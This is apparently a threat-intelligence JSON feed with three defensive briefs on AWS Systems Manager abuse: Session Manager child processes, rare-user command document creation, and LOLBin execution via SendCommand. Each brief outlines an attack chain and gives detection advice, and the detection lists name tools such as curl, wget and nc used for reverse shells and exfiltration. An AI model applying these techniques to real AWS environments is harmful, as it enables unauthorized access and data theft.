{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/ssm/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["AWS Systems Manager Session Manager"],"_cs_severities":["medium"],"_cs_tags":["aws","ssm","session-manager","execution","cloud"],"_cs_type":"advisory","_cs_vendors":["Amazon"],"content_html":"\u003cp\u003eAWS Systems Manager (SSM) Session Manager provides interactive shell access to EC2 instances and hybrid nodes without the need for bastion hosts or open inbound ports. Attackers can abuse this functionality by leveraging compromised AWS credentials or IAM roles with \u003ccode\u003essm:StartSession\u003c/code\u003e permissions to gain unauthorized access to target systems. This allows for remote execution of commands and lateral movement within the AWS environment. The technique involves spawning child processes from the SSM session worker process to perform malicious activities. Defenders should monitor for unusual process execution patterns originating from SSM sessions to identify potential abuse.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains access to valid AWS credentials or IAM role with \u003ccode\u003essm:StartSession\u003c/code\u003e permissions.\u003c/li\u003e\n\u003cli\u003eAttacker initiates an SSM session to a target EC2 instance or hybrid node using the compromised credentials.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003essm-session-worker\u003c/code\u003e process is started on the target instance to manage the interactive session.\u003c/li\u003e\n\u003cli\u003eAttacker executes commands within the session, spawning child processes from the \u003ccode\u003essm-session-worker\u003c/code\u003e process.\u003c/li\u003e\n\u003cli\u003eAttacker may use scripting languages such as PowerShell or Bash to execute malicious code (e.g., using \u003ccode\u003eawsrunPowerShellScript\u003c/code\u003e or \u003ccode\u003eawsrunShellScript\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThese scripts perform reconnaissance, download additional tools, or attempt credential access.\u003c/li\u003e\n\u003cli\u003eAttacker moves laterally to other instances or resources within the AWS environment.\u003c/li\u003e\n\u003cli\u003eThe ultimate objective is often data exfiltration, privilege escalation, or maintaining persistent access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to unauthorized access to sensitive data, compromise of critical systems, and lateral movement within the AWS environment. The impact can range from data breaches to complete control of the compromised infrastructure. The number of affected systems depends on the scope of the compromised credentials and the attacker\u0026rsquo;s ability to move laterally. Organizations using AWS SSM are at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM and tune for your environment to detect suspicious child processes spawned by \u003ccode\u003essm-session-worker\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eCorrelate process activity with AWS CloudTrail logs for \u003ccode\u003eStartSession\u003c/code\u003e and related API calls to identify the IAM principal initiating the session (see the overview section for API names).\u003c/li\u003e\n\u003cli\u003eImplement strict IAM policies and regularly review AWS credentials to minimize the risk of credential compromise.\u003c/li\u003e\n\u003cli\u003eMonitor \u003ccode\u003eprocess.command_line\u003c/code\u003e, \u003ccode\u003eprocess.executable\u003c/code\u003e, \u003ccode\u003eprocess.user.name\u003c/code\u003e for unusual activity within SSM sessions.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-01T20:57:28Z","date_published":"2026-05-01T20:57:28Z","id":"/briefs/2024-01-aws-ssm-session-manager-abuse/","summary":"Adversaries abuse AWS Systems Manager (SSM) Session Manager to gain remote execution and lateral movement within AWS environments by spawning malicious child processes from the SSM session worker, leveraging legitimate AWS credentials and IAM permissions.","title":"AWS SSM Session Manager Child Process Execution Abuse","url":"https://feed.craftedsignal.io/briefs/2024-01-aws-ssm-session-manager-abuse/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["low"],"_cs_tags":["cloud","aws","ssm","execution"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThis rule identifies when an AWS Systems Manager (SSM) command document is created by a user or role who does not typically perform this action. The rule focuses on detecting anomalous creation of SSM command documents. Adversaries may create SSM command documents to execute commands on managed instances, potentially leading to unauthorized access, command and control, and data exfiltration. The rule utilizes AWS CloudTrail logs to monitor the \u003ccode\u003eCreateDocument\u003c/code\u003e API call within the SSM service. This activity is flagged when the user or role creating the document deviates from established patterns, indicating a potential security risk. This detection is relevant for organizations using AWS SSM for managing their infrastructure and aims to prevent unauthorized command execution on managed instances.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to an AWS account, potentially through compromised credentials or an exposed IAM role.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to create a new SSM Command document using the \u003ccode\u003eCreateDocument\u003c/code\u003e API call.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eCreateDocument\u003c/code\u003e API call is logged by AWS CloudTrail with details about the user identity, request parameters, and document description.\u003c/li\u003e\n\u003cli\u003eThe detection rule analyzes CloudTrail logs, specifically looking for the \u003ccode\u003eCreateDocument\u003c/code\u003e event with a document type of \u003ccode\u003eCommand\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe rule identifies the user or role associated with the \u003ccode\u003eCreateDocument\u003c/code\u003e API call by inspecting the \u003ccode\u003eaws.cloudtrail.user_identity.arn\u003c/code\u003e field.\u003c/li\u003e\n\u003cli\u003eIf the user or role is considered rare or unusual for creating SSM Command documents within the organization, the rule triggers an alert.\u003c/li\u003e\n\u003cli\u003eThe attacker could then use the created document to execute arbitrary commands on managed instances.\u003c/li\u003e\n\u003cli\u003eSuccessful execution of these commands leads to various impacts, including unauthorized access, command and control, data exfiltration, or disruption of services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe successful exploitation of this technique can lead to unauthorized access to AWS resources, potentially affecting all systems managed by AWS SSM in the targeted environment. The creation of malicious SSM command documents can lead to data exfiltration, system compromise, or denial of service. If successful, this can impact hundreds or thousands of systems depending on the scope of AWS SSM usage in the organization.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;AWS SSM Command Document Created by Rare User\u0026rdquo; to your SIEM, ensuring proper indexing of CloudTrail logs (index = [\u0026ldquo;filebeat-*\u0026rdquo;, \u0026ldquo;logs-aws.cloudtrail-*\u0026rdquo;]).\u003c/li\u003e\n\u003cli\u003eReview the \u003ccode\u003eaws.cloudtrail.request_parameters.content\u003c/code\u003e field in the CloudTrail logs for any suspicious commands within the created SSM document.\u003c/li\u003e\n\u003cli\u003eRestrict SSM document creation permissions to specific, trusted roles or users to prevent unauthorized document creation as mentioned in the overview.\u003c/li\u003e\n\u003cli\u003eMonitor the \u003ccode\u003eSendCommand\u003c/code\u003e API call related to the created SSM document to see if it is used to execute commands on managed instances, as described in the triage section.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-10T16:27:52Z","date_published":"2026-04-10T16:27:52Z","id":"/briefs/2024-11-aws-ssm-rare-user/","summary":"An AWS Systems Manager (SSM) command document creation by a user or role who does not typically perform this action, which can lead to unauthorized access, command and control, or data exfiltration.","title":"AWS SSM Command Document Created by Rare User","url":"https://feed.craftedsignal.io/briefs/2024-11-aws-ssm-rare-user/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["aws","ec2","ssm","lolbin","execution","cloud"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThis threat brief focuses on detecting the execution of Living Off the Land Binaries (LOLBins) or GTFOBins on Amazon EC2 instances via AWS Systems Manager (SSM) \u003ccode\u003eSendCommand\u003c/code\u003e API. The technique involves correlating AWS CloudTrail \u003ccode\u003eSendCommand\u003c/code\u003e events with endpoint process execution by matching SSM command IDs. While AWS redacts command parameters in CloudTrail logs, this correlation technique reveals the actual commands executed on EC2 instances. This is critical because adversaries may abuse SSM to execute malicious commands remotely without requiring SSH or RDP access. They can leverage legitimate system utilities for various malicious purposes, including data exfiltration, establishing reverse shells, or facilitating lateral movement within the cloud environment. The rule was last updated on 2026-04-10.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to AWS via compromised credentials or an exposed IAM role.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the AWS CLI or API to initiate an SSM \u003ccode\u003eSendCommand\u003c/code\u003e to a target EC2 instance. The \u003ccode\u003eDocumentName\u003c/code\u003e parameter is set to \u003ccode\u003eAWS-RunShellScript\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe SSM agent on the EC2 instance receives the \u003ccode\u003eSendCommand\u003c/code\u003e request.\u003c/li\u003e\n\u003cli\u003eThe SSM agent executes a shell script (\u003ccode\u003e_script.sh\u003c/code\u003e) within a dedicated directory for orchestration.\u003c/li\u003e\n\u003cli\u003eThe shell script executes a LOLBin, such as \u003ccode\u003ecurl\u003c/code\u003e, \u003ccode\u003ewget\u003c/code\u003e, \u003ccode\u003epython\u003c/code\u003e, or \u003ccode\u003eperl\u003c/code\u003e, to perform malicious actions. The parent process of the LOLBin will be the SSM shell script.\u003c/li\u003e\n\u003cli\u003eThe LOLBin is used to download a malicious payload, establish a reverse shell, or exfiltrate data.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the established reverse shell to perform further actions on the EC2 instance.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to unauthorized access to EC2 instances, data exfiltration, deployment of malware, and lateral movement within the AWS environment. Although a number of impacted organizations is not available, this attack is able to bypass traditional network security controls. Organizations in any sector utilizing AWS EC2 instances and SSM are potentially at risk. The lack of required SSH or RDP access makes this technique particularly stealthy.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable AWS CloudTrail logging to capture \u003ccode\u003eSendCommand\u003c/code\u003e events and monitor for \u003ccode\u003eAWS-RunShellScript\u003c/code\u003e in the \u003ccode\u003erequest_parameters\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect AWS EC2 LOLBin Execution via SSM SendCommand\u0026rdquo; to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eMonitor endpoint process execution logs for the execution of LOLBins like \u003ccode\u003ecurl\u003c/code\u003e, \u003ccode\u003ewget\u003c/code\u003e, \u003ccode\u003epython\u003c/code\u003e, \u003ccode\u003eperl\u003c/code\u003e, \u003ccode\u003enc\u003c/code\u003e, etc., with parent processes related to SSM.\u003c/li\u003e\n\u003cli\u003eImplement strict IAM policies to restrict SSM \u003ccode\u003eSendCommand\u003c/code\u003e permissions to only authorized users and roles.\u003c/li\u003e\n\u003cli\u003eReview and audit existing SSM configurations to identify and remediate any overly permissive settings.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-10T16:27:52Z","date_published":"2026-04-10T16:27:52Z","id":"/briefs/2024-01-03-aws-ec2-lolbin-ssm/","summary":"Detection of Living Off the Land Binaries (LOLBins) or GTFOBins execution on EC2 instances via AWS Systems Manager (SSM) SendCommand API, potentially indicating malicious activity.","title":"AWS EC2 LOLBin Execution via SSM SendCommand","url":"https://feed.craftedsignal.io/briefs/2024-01-03-aws-ec2-lolbin-ssm/"}],"language":"en","title":"CraftedSignal Threat Feed — Ssm","version":"https://jsonfeed.org/version/1.1"}